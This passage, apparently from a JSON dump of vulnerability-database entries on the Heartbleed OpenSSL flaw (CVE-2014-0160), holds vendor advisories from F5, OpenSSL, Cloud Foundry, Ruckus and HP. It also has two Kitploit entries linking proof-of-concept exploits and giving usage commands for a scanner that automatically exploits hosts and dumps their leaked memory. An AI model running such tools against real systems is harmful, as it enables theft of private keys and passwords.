HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\nAffected big3d versions\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n * big3d version 11.5.0.1.0.227 for Linux \n * big3d version 11.5.1.0.0.110 for Linux\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to [K13703: Overview of big3d version management](<https://support.f5.com/csp/article/K13703>).\n\nBIG-IP maintenance and user passwords\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * [K13121: Changing system maintenance account passwords (11.x - 14.x)](<https://support.f5.com/csp/article/K13121>)\n * _**BIG-IP TMOS: Concepts guide**_\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\nMitigating this vulnerability\n\nTo mitigate this vulnerability, you should consider the following recommendations:\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n * [K13163: SSL ciphers supported on BIG-IP platforms (11.x - 13.x)](<https://support.f5.com/csp/article/K13163>)\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K13187: COMPAT SSL ciphers are no longer included in standard cipher strings](<https://support.f5.com/csp/article/K13187>)\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL.\n\n * <http://heartbleed.com/>\n\n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * [K14783: Overview of the Client SSL profile (11.x - 13.x)](<https://support.f5.com/csp/article/K14783>)\n * [K12463: Overview of F5 Edge products](<https://support.f5.com/csp/article/K12463>)\n * [K13757: BIG-IP Edge Client version matrix](<https://support.f5.com/csp/article/K13757>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n", "modified": "2019-07-30T19:46:00", "published": "2015-02-17T01:30:00", "id": "F5:K15159", "href": "https://support.f5.com/csp/article/K15159", "title": "OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2016-09-26T17:23:23", "bulletinFamily": "software", "description": "**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to SOL13123: Managing BIG-IP product hotfixes (11.x).\n\n**BIG-IP Edge Client fixes** \n\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2, and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to SOL8986: F5 software lifecycle policy.\n\nRecommended action\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * SOL14620: Managing SSL certificates for BIG-IP systems\n * SOL14534: Creating SSL certificates and keys with OpenSSL (11.x) \n\n * SOL13579: Generating new default certificate and key pairs for BIG-IP SSL profiles\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * SOL9114: Creating an SSL device certificate and key pair using OpenSSL\n * SOL7754: Renewing self-signed device certificates\n\n**Important**: After you generate a new device certificate and private key pair, you will need to re-establish device trusts. In addition, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you will need to recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a CMI certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group. \n\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * SOL13649: Creating a device group using the Configuration utility\n * SOL13639: Creating a device group using the Traffic Management Shell\n * SOL13946: Troubleshooting ConfigSync and device service clustering issues (11.x)\n\nThe big3d process \n\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\n**Affected big3d versions**\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n\n * big3d version 11.5.0.1.0.227 for Linux \n\n * big3d version 11.5.1.0.0.110 for Linux \n\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to the following article:\n\n * SOL13703: Overview of big3d version management \n\n\nBIG-IP maintenance and user passwords \n\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * SOL13121: Changing system maintenance account passwords (11.x)\n * BIG-IP TMOS: Concepts guide \n\n\n**Mitigating this vulnerability**\n\nTo mitigate this vulnerability, you should consider the following recommendations: \n\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n \n\n * SOL13163: SSL ciphers supported on BIG-IP platforms (11.x)\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL13187: COMPAT SSL ciphers are no longer included in standard cipher strings\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL. For more information about using iRules to protect the back-end servers, refer to the Supplemental Information section.\n\nSupplemental Information\n\n * [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>)\n * <http://heartbleed.com/> \n \n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * SOL14783: Overview of the Client SSL profile (11.x)\n * SOL12463: Overview of F5 Edge products\n * SOL13757: BIG-IP Edge Client version matrix\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n", "modified": "2015-02-16T00:00:00", "published": "2014-04-08T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "id": "SOL15159", "title": "SOL15159 - OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openssl": [{"lastseen": "2016-09-26T17:22:34", "bulletinFamily": "software", "description": "A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64kB of memory to a connected client or server (a.k.a. Heartbleed). This issue did not affect versions of OpenSSL prior to 1.0.1. Reported by Neel Mehta.", "modified": "2014-04-07T00:00:00", "published": "2014-04-07T00:00:00", "id": "OPENSSL:CVE-2014-0160", "href": "https://www.openssl.org/news/vulnerabilities.html", "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2014-0160)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:48", "bulletinFamily": "software", "description": "CVE-2014-0160 Heartbleed\n\n# \n\nCritical\n\n# Vendor\n\nOpenSSL.org\n\n# Versions Affected\n\n * 1.0.1 through 1.0.1f\n\n# Description\n\nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n# Affected Pivotal Products and Versions\n\n_Severity is critical unless otherwise noted. \n_\n\n * vFabric Web Server 5.0.x, 5.1.x, 5.2.x, 5.3.x\n * vFabric GemFire Native Client 7.0.0.X, 7.0.1.X\n * Pivotal GemFire Native Client 7.0.2.X\n * Pivotal Command Center 2.0.x, 2.1.x\n * Pivotal App Suite Virtual Appliance 1.0.1.3\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * vFabric Web Server users (all versions) should apply the patch including version 1.0.1g of OpenSSL per the instructions posted here as soon as possible.\n * GemFire Native Client 7.0.X users should immediately upgrade to OpenSSL 1.0.1g or later or recompile their existing OpenSSL 1.0.1 installations with the \u2013DOPENSSL_NO_HEARTBEATS option. See [CVE-2014-0160-GemFire-Native-Client](<http://gemfire.docs.pivotal.io/security/CVE-2014-0160-GemFire-Native-Client.pdf>) for more information.\n * Please see [this doc](<http://docs.pivotal.io/pivotalhd/advisories/CVE-2014-0160-Advisory-PCC.pdf>) for Pivotal Command Center.\n * Pivotal App Suite Virtual Appliance 1.0.1.3 users should upgrade to version 1.0.1.5 as soon as possible.\n\n# Credit\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security, who first reported it to the OpenSSL team. The Codenomicon team found the Heartbleed bug while improving the SafeGuard feature in Codenomicon\u2019s Defensics security testing tools and reported this bug to the NCSC-FI for vulnerability coordination and reporting to the OpenSSL team.\n\n# References\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>\n * <http://www.openssl.org/news/vulnerabilities.html>\n * <http://www.kb.cert.org/vuls/id/720951>\n * <http://heartbleed.com/>\n * <https://access.redhat.com/site/solutions/781793>\n\n# History\n\n2014-Apr-7: Initial vulnerability report published.\n", "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "href": "https://www.cloudfoundry.org/blog/cve-2014-0160/", "title": "CVE-2014-0160 Heartbleed | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kitploit": [{"lastseen": "2019-10-18T09:39:59", "bulletinFamily": "tools", "description": "[  ](<https://2.bp.blogspot.com/-Mbb_SUv_D74/U0XpU8smaLI/AAAAAAAACWI/jTkhKsqAzNE/s1600/heartbleed.png>)\n\n \n \n \n\n\n * A checker (site and tool) for CVE-2014-0160: [ https://github.com/FiloSottile/Heartbleed ](<https://github.com/FiloSottile/Heartbleed>)\n * ** ssltest.py ** : Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [ http://pastebin.com/WmxzjkXJ ](<https://pastebin.com/WmxzjkXJ>)\n * ** SSL Server Test ** [ https://www.ssllabs.com/ssltest/index.html ](<https://www.ssllabs.com/ssltest/index.html>)\n * ** Metasploit Module: ** [ https://github.com/rapid7/metasploit-framework/pull/3206/files ](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * ** Nmap NSE script: ** Detects whether a server is vulnerable to the OpenSSL Heartbleed: [ https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse ](<https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse>)\n * ** Nmap NSE script: ** Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas [ https://gist.github.com/RealRancor/10140249 ](<https://gist.github.com/RealRancor/10140249>)\n * ** Heartbleeder: ** Tests your servers for OpenSSL: [ https://github.com/titanous/heartbleeder?files=1 ](<https://github.com/titanous/heartbleeder?files=1>)\n * ** Heartbleed Attack POC and Mass Scanner: ** [ https://bitbucket.org/fb1h2s/cve-2014-0160 ](<https://bitbucket.org/fb1h2s/cve-2014-0160>)\n * ** Heartbleed Honeypot Script: ** [ http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt ](<http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt>)\n", "modified": "2014-04-10T00:55:31", "published": "2014-04-10T00:55:31", "id": "KITPLOIT:8800200070735873517", "href": "http://www.kitploit.com/2014/04/collection-of-heartbleed-tools-openssl.html", "title": "Collection of Heartbleed Tools (OpenSSL CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-18T12:33:44", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-skuQnYDMoeg/VgyaDSePF2I/AAAAAAAAErQ/_PvtuA7Eobc/s1600/Heartbleed_Scanner.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-4_jmIXJOYP4/VgyazZV8McI/AAAAAAAAErY/0zg4jbkRndU/s1600/Heartbleed%2BScanner.png>)\n\n \n\n\nHeartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written with python. \n\n \n\n\nFor scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system to check after. \n\n\n \n\n\nHearbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS. \n \n \n git clone https://github.com/hybridus/heartbleedscanner.git\n\n \n** Sample usage ** \n \nTo scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file: \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r\n\n \nTo scan the same network against SMTP Over SSL/TLS and randomize the IP addresses \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r\n\n \nIf you already have a target list which you created by using nmap/zmap \n\n \n \n python heartbleedscan.py -i targetlist.txt\n\n \n** Dependencies ** \n** \n** Before using Heartbleed Vulnerability Scanner, you should install ** python-netaddr ** package. \n \nCentOS or CentOS-like systems : \n\n \n \n yum install python-netaddr\n\n \nUbuntu or Debian-like systems : \n\n \n \n apt-get insall python-netaddr\n\n \n \n\n\n** [ Download Heartbleed Vulnerability Scanner ](<https://github.com/hybridus/heartbleedscanner>) **\n", "modified": "2015-10-01T09:47:01", "published": "2015-10-01T09:47:01", "id": "KITPLOIT:7942195329946074809", "href": "http://www.kitploit.com/2015/10/heartbleed-vulnerability-scanner.html", "title": "Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nRUCKUS ADVISORY ID 041414\r\n\r\nCustomer release date: April 14, 2014\r\nPublic release date: April 14, 2014\r\n\r\nTITLE\r\n\r\nOpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160\r\n\r\n\r\nSUMMARY\r\n\r\nOpenSSL library is used in Ruckus products to implement various\r\nsecurity related features. A vulnerability has been discovered in\r\nOpenSSL library which may allow an unauthenticated, remote attacker to\r\nretrieve memory in chunks of 64 kilobytes from a connected client or\r\nserver. An exploit could disclose portions of memory containing\r\nsensitive security material such as passwords and private keys.\r\n\r\n\r\nAFFECTED SOFTWARE VERSIONS AND DEVICES\r\n\r\n\r\n Device Affected software\r\n- --------------------- ------------------\r\nSmart Cell Gateway 1.1.x\r\nSmartCell Access Points NOT AFFECTED\r\nZoneDirector Controllers NOT AFFECTED\r\nZoneFlex Access Points NOT AFFECTED\r\n\r\n\r\nAny products or services not mentioned in the table above are not affected\r\n\r\n\r\nDETAILS\r\n\r\nA vulnerability has been discovered in the popular OpenSSL\r\ncryptographic software library. This weakness exists in OpenSSL's\r\nimplementation of the TLS/DTLS (transport layer security protocols)\r\nheartbeat extension (RFC6520). This vulnerability is due to a missing\r\nbounds check in implementation of the handling of the heartbeat\r\nextension. When exploited, this issue may lead to leak of memory\r\ncontents from the server to the client and from the client to the\r\nserver. These memory contents could contain sensitive security\r\nmaterial such as passwords and private keys.\r\n\r\n\r\nIMPACT\r\n\r\nRuckus devices incorporate OpenSSL library to implement various\r\nsecurity related features. Below is list of the affected components:\r\n\r\n- - Administrative HTTPS Interface (Port 8443)\r\n\r\n\r\nCVSS v2 Base Score:5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\n\r\n\r\n \r\nWORKAROUNDS\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical. However, in the event that a patch cannot\r\nimmediately be applied, the following suggestions might help reduce\r\nthe risk:\r\n\r\n - Do not expose administrative interfaces of Ruckus devices to\r\nuntrusted networks such as the Internet.\r\n\r\n - Use a firewall to limit traffic to/from Ruckus device's\r\nadministrative interface to trusted hosts.\r\n\r\n \r\n\r\nSOLUTION\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical.\r\n\r\nThe following software builds have the fix (any later builds will also\r\nhave the fix):\r\n\r\n\r\nBranch Software Build\r\n- ------- ------------------\r\n1.1.x 1.1.2.0.142\r\n\r\n\r\n\r\n\r\nDISCOVERY\r\n\r\nThis vulnerability was disclosed online on various sources :\r\n\r\n- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\r\n- - https://www.openssl.org/news/secadv_20140407.txt\r\n- - http://heartbleed.com/\r\n\r\n\r\n\r\n\r\nOBTAINING FIXED FIRMWARE\r\n\r\nRuckus customers can contact Ruckus support to obtain the fixed firmware\r\n\r\nRuckus Support contact list is at:\r\n https://support.ruckuswireless.com/contact-us\r\n\r\n\r\nPUBLIC ANNOUNCEMENTS\r\n\r\nThis security advisory will be made available for public consumption\r\non April 14, 2014 at the following source\r\n\r\nRuckus Website\r\nhttp://www.ruckuswireless.com/security\r\n\r\nSecurityFocus Bugtraq\r\nhttp://www.securityfocus.com/archive/1\r\n\r\n\r\nFuture updates of this advisory, if any, will be placed on Ruckus's\r\nwebsite, but may or may not be actively announced on mailing lists.\r\n\r\nREVISION HISTORY\r\n\r\n Revision 1.0 / 14th April 2014 / Initial release\r\n\r\n\r\nRUCKUS WIRELESS SECURITY PROCEDURES\r\n\r\nComplete information on reporting security vulnerabilities in Ruckus\r\nWireless\r\nproducts, obtaining assistance with security incidents is available at\r\n http://www.ruckuswireless.com/security\r\n \r\n \r\nFor reporting new security issues, email can be sent to\r\nsecurity(at)ruckuswireless.com\r\nFor sensitive information we encourage the use of PGP encryption. Our\r\npublic keys can be\r\nfound at http://www.ruckuswireless.com/security\r\n\r\n \r\nSTATUS OF THIS NOTICE: Final\r\n\r\nAlthough Ruckus cannot guarantee the accuracy of all statements\r\nin this advisory, all of the facts have been checked to the best of our\r\nability. Ruckus does not anticipate issuing updated versions of\r\nthis advisory unless there is some material change in the facts. Should\r\nthere be a significant change in the facts, Ruckus may update this\r\nadvisory.\r\n\r\n\r\n(c) Copyright 2014 by Ruckus Wireless\r\nThis advisory may be redistributed freely after the public release\r\ndate given at\r\nthe top of the text, provided that redistributed copies are complete and\r\nunmodified, including all date and version information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.18 (Darwin)\r\nComment: GPGTools - http://gpgtools.org\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niQEcBAEBAgAGBQJTTBeuAAoJEFH6g5RLqzh1fRsIAJ9MtudIbdzR7mm/hP0i7boN\r\nMqlHAnFWai1c99UX048I9PSwWzWuEj4/1E4jy4vQqxLG8gO0YbAQiGq4DDGErCU0\r\nAywV+p3Xlcn0SXp0vse/qnhOT0jVOOKXPZSokmoptQXbd28ZOYtGfMJozTvPh2vf\r\nAvGq2B5kciGVhvBc9hdHGhSla/xUr/puIOBKFtNfMuxPujJ62t8g07w2HCB51PL/\r\n5E5MrP4540n3ONZ9+w5h/AeVfvVXsFv25VuElckq6Anzm+iqNRjcWHdync14UqPx\r\n2kXr1E72zRYbY/Z7+QkQuL1REkka+RtGcwbo05u+aEUnPx3E9wvdCHjf6XhxcbI=\r\n=sbsc\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30472", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30472", "title": "RUCKUS ADVISORY ID 041414: OpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04262472\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04262472\r\nVersion: 2\r\n\r\nHPSBMU03020 rev.2 - HP Version Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM) running OpenSSL on Linux and Windows, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-24\r\nLast Updated: 2014-04-29\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Version\r\nControl Agent (VCA) and Version Control Repository Manager (VCRM) running\r\nOpenSSL on Linux and Windows. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101531\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for HP Version Control\r\nAgent (VCA) and Version Control Repository Manager (VCRM).\r\n\r\nNote: OpenSSL has been updated 1.0.1g in these updates.\r\n\r\nProduct version/Platform\r\n Download Location (Web or FTP)\r\n\r\nHP Version Control Agent v7.3.2 for Windows x86\r\n\r\nhttp://www.hp.com/swpublishing/MTX-5d66a09b2e6a490e9a61950f21\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p639883427/v97218\r\n\r\nHP Version Control Agent v7.3.2 for Windows x64\r\n\r\nhttp://www.hp.com/swpublishing/MTX-bd3ae96c013346078625d38398\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p519919823/v97223\r\n\r\nHP Version Control Agent v7.3.2 for Linux\r\n\r\nhttp://www.hp.com/swpublishing/MTX-d517a8466f6341d38519b5277b\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1174025843/v97276\r\n\r\nHP Version Control Repository Manager v7.3.2\r\n\r\nhttp://www.hp.com/swpublishing/MTX-5ee056c2b13449e8b7153e21a1\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p283849675/v97269\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 2014 Initial release\r\nVersion:2 (rev.2) - 29 April 2014 Added Software update information\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 